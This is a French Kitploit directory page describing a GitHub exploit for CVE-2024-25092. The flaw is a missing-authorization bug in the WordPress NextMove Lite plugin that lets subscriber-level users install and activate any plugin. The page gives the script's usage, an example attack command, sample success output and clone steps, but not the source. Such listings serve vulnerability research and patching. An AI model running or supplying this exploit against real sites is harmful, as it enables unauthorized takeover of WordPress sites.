Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-25092 — Plugin WordPress NextMove Lite <= 2.17.0 - Vulnérabilité d'Installation/Activation arbitraire de plugin Subscriber+ | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-25092
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-25092

CVE-2024-25092

Plugin WordPress NextMove Lite <= 2.17.0 - Vulnérabilité d'Installation/Activation arbitraire de plugin Subscriber+

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2024-25092

Aperçu

CVE-2024-25092 est une vulnérabilité de haute sévérité affectant le plugin WordPress NextMove Lite (versions <= 2.17.0). Cette vulnérabilité permet à un utilisateur de niveau abonné ou supérieur d'installer et d'activer des plugins arbitraires sur un site WordPress en raison de l'absence de contrôles d'autorisation.

Détails

  • Publié : 2024-06-09
  • Mis à jour : 2024-06-09
  • Sévérité : Haute (Score CVSS : 8.8)
  • CWE : CWE-862 - Autorisation manquante
  • Versions affectées : Toutes les versions de n/a à 2.17.0

Vecteur CVSS

  • Version CVSS : 3.1
  • Chaîne du vecteur : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Le plugin XLPlugins NextMove Lite pour WordPress présente une vulnérabilité d'autorisation manquante, permettant aux utilisateurs authentifiés ayant des autorisations de niveau abonné ou supérieur d'effectuer des installations et activations arbitraires de plugins. Cela peut conduire à un compromis total du site WordPress.

Script d'exploitation

Le script Python fourni automatise l'exploitation de cette vulnérabilité en se connectant au site WordPress et en installant un plugin spécifié.

Utilisation

root@kitploit:~
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL
  -un USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin to install (default: cart-for-woocommerce)

Exemple

root@kitploit:~
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin

Sortie

root@kitploit:~
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.

Détails du script

Prérequis

  • Python 3.x
  • Bibliothèque requests

Installation

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-25092.git
    cd CVE-2024-25092
    
  2. Installez les paquets Python requis :

    root@kitploit:~
    pip install requests
    

Avertissement

Ce script est destiné uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite. Toute utilisation non autorisée de ce script est illégale et contraire à l'éthique.

Télécharger l’outil